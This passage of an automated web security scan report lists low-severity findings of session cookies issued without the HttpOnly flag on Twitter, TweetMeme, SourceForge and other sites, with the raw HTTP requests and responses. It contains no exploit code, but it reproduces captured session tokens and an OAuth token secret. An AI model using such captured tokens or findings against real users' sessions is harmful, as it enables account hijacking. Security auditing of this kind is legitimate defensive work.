14.55. http://sonspring.com/journal/clearing-floats previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sonspring.com
Path:	/journal/clearing-floats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS918cc6b448652b9859114bc571796adc=5b964cf985014beec23ef0339032c9d8; expires=Thu, 17-Feb-2011 02:14:14 GMT; path=/; domain=.sonspring.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /journal/clearing-floats HTTP/1.1
Host: sonspring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:54 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Set-Cookie: SESS918cc6b448652b9859114bc571796adc=5b964cf985014beec23ef0339032c9d8; expires=Thu, 17-Feb-2011 02:14:14 GMT; path=/; domain=.sonspring.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:40:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12896

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge" />
<title>SonSpring | Clearing Floats
...[SNIP]...

14.56. http://sourceforge.net/softwaremap/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sourceforge.net
Path:	/softwaremap/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=c9a0c9e1734e82873111a96cf441cae9; expires=Mon, 07-Feb-2011 16:02:35 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.57. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=fs7cao9ricm3m32upt64vdhf53; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.58. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session=1295919344|1295919344; path=/; domain=.mookie1.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.59. http://tenzing.fmpub.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tenzing.fmpub.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=o8r2d70fbt2a9rlrjcdd1sbkf5; path=/
ltuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
vuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?t=z&n=2671&kw=undefined&fleur_de_sel=7742680979426950 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 204 No Content
Date: Mon, 24 Jan 2011 22:20:55 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=o8r2d70fbt2a9rlrjcdd1sbkf5; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ltuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Set-Cookie: vuid=e56d49c6a36647eed350479fba6a0dd3; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Content-Length: 0
X-Server: adserver10.tor.fmpub.net
Connection: close
Content-Type: text/html; charset=UTF-8

14.60. http://themehybrid.com/themes/shadow previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://themehybrid.com
Path:	/themes/shadow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e59ccbea599b13d912fb7478431f66b7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/shadow HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.61. http://thenextweb.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://thenextweb.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=58stbpu9kt87t9l1ok1jpakh74; path=/
bp-message=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/
bp-message-type=deleted; expires=Mon, 25-Jan-2010 13:16:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: thenextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.62. http://tweetmeme.com/auth/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tweetmeme.com
Path:	/auth/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

oauth_token_secret=F8Jp4xd1ikqZ1oJAnt5JGDsnBEUPdV8pQBORg61Of0; path=/auth/; domain=.tweetmeme.com
redirect=http%3A%2F%2Ftweetmeme.com; expires=Tue, 25-Jan-2011 13:23:22 GMT; path=/auth/; domain=.tweetmeme.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /auth/login?r=http%3A%2F%2Ftweetmeme.com HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:21:22 GMT
Content-Type: text/html
Connection: close
P3p: CP="CAO PSA"
Location: https://api.twitter.com/oauth/authenticate?oauth_token=Er6o8OOxPpkUaFRriG4oF5qpl530ytvIj1cQc1mehI
Set-Cookie: redirect=http%3A%2F%2Ftweetmeme.com; expires=Tue, 25-Jan-2011 13:23:22 GMT; path=/auth/; domain=.tweetmeme.com
Set-Cookie: oauth_token_secret=F8Jp4xd1ikqZ1oJAnt5JGDsnBEUPdV8pQBORg61Of0; path=/auth/; domain=.tweetmeme.com
X-Ads-Served-In: 8.6069107055664E-5
X-Served-In: 0.78739500045776
X-Served-By: h01
Content-Length: 0

14.63. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWQ2OTE2NzQ1OWNkMjZmNGJkODYxYjkwNzEzYWI0N2U0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIBk5Kui0B--357ce574d35e8822769e63fd9d1dd29f4461904b; domain=.twitter.com; path=/
k=173.193.214.243.1295910586462673; path=/; expires=Mon, 31-Jan-11 23:09:46 GMT; domain=.twitter.com
guest_id=129591058790861047; path=/; expires=Wed, 23 Feb 2011 23:09:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:09:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910587-82359-30173
ETag: "9a6712df9e465f208b30f02c1f450eaf"
Last-Modified: Mon, 24 Jan 2011 23:09:47 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Content-Length: 43988
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910586462673; path=/; expires=Mon, 31-Jan-11 23:09:46 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591058790861047; path=/; expires=Wed, 23 Feb 2011 23:09:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQ2OTE2NzQ1OWNkMjZmNGJkODYxYjkwNzEzYWI0N2U0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIBk5Kui0B--357ce574d35e8822769e63fd9d1dd29f4461904b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

14.64. http://twitter.com/7News/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/7News/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.65. http://twitter.com/7News/newsteam previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/7News/newsteam

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7News/newsteam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.66. http://twitter.com/7News/status/29619600551317504 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/7News/status/29619600551317504

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlMWUxNmY3YWFiZTFkMjk3MjM1NjU1ZjBkMzliNzg5%250AMTM6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL3N0YXR1%250Acy8yOTYxOTYwMDU1MTMxNzUwNDoHaWQiJTgzNTE4ZDU1NGI3NjIwMzE0Y2Ex%250AMWIzZGQ1MThmZjFlIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIWLlGui0B--925e1e31fa9a3e0528e8a01d8e0ecb1f6fcb625d; domain=.twitter.com; path=/
k=173.193.214.243.1295910352494991; path=/; expires=Mon, 31-Jan-11 23:05:52 GMT; domain=.twitter.com
guest_id=129591035323884356; path=/; expires=Wed, 23 Feb 2011 23:05:53 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7News/status/29619600551317504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.67. http://twitter.com/7news previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/7news

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.68. http://twitter.com/Ihtirametna/status/12955399590252544/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Ihtirametna/status/12955399590252544/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNtCw7gtAToHaWQiJTYwY2Q0YjYwYWE3MjQy%250AZDQ4ODkyNDY0NWUxM2UzMjI0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a3eb60c69659a4af34e599aed5ff2f06b71faec8; domain=.twitter.com; path=/
k=173.193.214.243.1295884960208230; path=/; expires=Mon, 31-Jan-11 16:02:40 GMT; domain=.twitter.com
guest_id=129588496047341904; path=/; expires=Wed, 23 Feb 2011 16:02:40 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Ihtirametna/status/12955399590252544/x22 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:02:40 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1295884960-45495-1332
Last-Modified: Mon, 24 Jan 2011 16:02:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884960208230; path=/; expires=Mon, 31-Jan-11 16:02:40 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588496047341904; path=/; expires=Wed, 23 Feb 2011 16:02:40 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNtCw7gtAToHaWQiJTYwY2Q0YjYwYWE3MjQy%250AZDQ4ODkyNDY0NWUxM2UzMjI0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a3eb60c69659a4af34e599aed5ff2f06b71faec8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

14.69. http://twitter.com/LizPW/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/LizPW/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWRlMWQ2NzdlN2Y2ZTU0NGM4ZWEyNTMyMWY1ZTk3YzU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsID9NKui0B--e7abc610de60e62983759c4d12e8f2cf3eede5ed; domain=.twitter.com; path=/
k=173.193.214.243.1295910621396653; path=/; expires=Mon, 31-Jan-11 23:10:21 GMT; domain=.twitter.com
guest_id=129591062196529909; path=/; expires=Wed, 23 Feb 2011 23:10:21 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LizPW/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.70. http://twitter.com/LizPW/status/29620929206165504 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/LizPW/status/29620929206165504

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlZjIzZWFjODQ4ZTMwNGMwZmI1ZjZiYzg5NTZmMmY3%250AOTQ6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tL0xpelBXL3N0YXR1%250Acy8yOTYyMDkyOTIwNjE2NTUwNDoHaWQiJTIzYjk5NTM3NmZiMjNlNTBiYWYw%250AZmUyZTUyM2MyNjFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISqJKui0B--b7721b8e7b4f79835b43a20e0bb17f7502fe2043; domain=.twitter.com; path=/
k=173.193.214.243.1295910608056839; path=/; expires=Mon, 31-Jan-11 23:10:08 GMT; domain=.twitter.com
guest_id=129591060947951191; path=/; expires=Wed, 23 Feb 2011 23:10:09 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LizPW/status/29620929206165504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.71. http://twitter.com/amazon/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/amazon/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJY%252Fw7gtAToHaWQiJWQxZTA1OTI4NWVjMGQw%250ANGM1YzFiYTU4NzYwYjJjZTVhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--51fd18caf68e4e25e41e8fafad032025c5b7a2ed; domain=.twitter.com; path=/
k=173.193.214.243.1295884959190770; path=/; expires=Mon, 31-Jan-11 16:02:39 GMT; domain=.twitter.com
guest_id=129588495963544389; path=/; expires=Wed, 23 Feb 2011 16:02:39 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amazon/x22 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:02:39 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1295884959-8967-51873
Last-Modified: Mon, 24 Jan 2011 16:02:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884959190770; path=/; expires=Mon, 31-Jan-11 16:02:39 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588495963544389; path=/; expires=Wed, 23 Feb 2011 16:02:39 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJY%252Fw7gtAToHaWQiJWQxZTA1OTI4NWVjMGQw%250ANGM1YzFiYTU4NzYwYjJjZTVhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--51fd18caf68e4e25e41e8fafad032025c5b7a2ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

14.72. http://twitter.com/cw56 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/cw56

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.73. http://twitter.com/datasift previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/datasift

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.74. http://twitter.com/friendships/show.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/friendships/show.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTc1MThmZDQ3MjNkMmRjNDIyYmM5MTFjMjZkOWJkZGRiIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1Xx6vS0B--32e5d478b51f542973344cd918d5a98870e5fb1c; domain=.twitter.com; path=/
k=173.193.214.243.1295964074919059; path=/; expires=Tue, 01-Feb-11 14:01:14 GMT; domain=.twitter.com
guest_id=129596407726759378; path=/; expires=Thu, 24 Feb 2011 14:01:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /friendships/show.json HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Tue, 25 Jan 2011 14:01:17 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1295964077-47163-14200
X-RateLimit-Limit: 150
Last-Modified: Tue, 25 Jan 2011 14:01:17 GMT
X-RateLimit-Remaining: 149
X-Runtime: 0.01144
Content-Type: application/json; charset=utf-8
Content-Length: 81
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1295967677
Set-Cookie: k=173.193.214.243.1295964074919059; path=/; expires=Tue, 01-Feb-11 14:01:14 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596407726759378; path=/; expires=Thu, 24 Feb 2011 14:01:17 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTc1MThmZDQ3MjNkMmRjNDIyYmM5MTFjMjZkOWJkZGRiIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1Xx6vS0B--32e5d478b51f542973344cd918d5a98870e5fb1c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

{"request":"\/friendships\/show.json","error":"Could not determine source user."}

14.75. http://twitter.com/goodies/tweetbutton previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/goodies/tweetbutton

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

